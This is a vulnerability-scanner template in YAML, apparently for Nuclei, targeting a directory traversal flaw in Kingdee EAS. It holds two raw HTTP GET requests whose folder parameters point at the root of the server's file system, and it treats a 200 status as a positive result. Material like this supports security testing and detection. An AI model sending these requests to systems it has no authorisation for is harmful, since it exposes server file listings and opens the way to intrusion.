id: poc-yaml-kingdee-eas-directory-traversal

info:
  name: poc-yaml-kingdee-eas-directory-traversal
  author: iak3ec(https://github.com/nu0l)
  severity: medium
  tags: xray-converted,ct-194280
  reference:
    - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E8%9D%B6OA%20server_file%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md

http:
  - raw:
      - |
        GET /appmonitor/protected/selector/server_file/files?folder=C://&suffix= HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
  - raw:
      - |
        GET /appmonitor/protected/selector/server_file/files?folder=/&suffix= HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200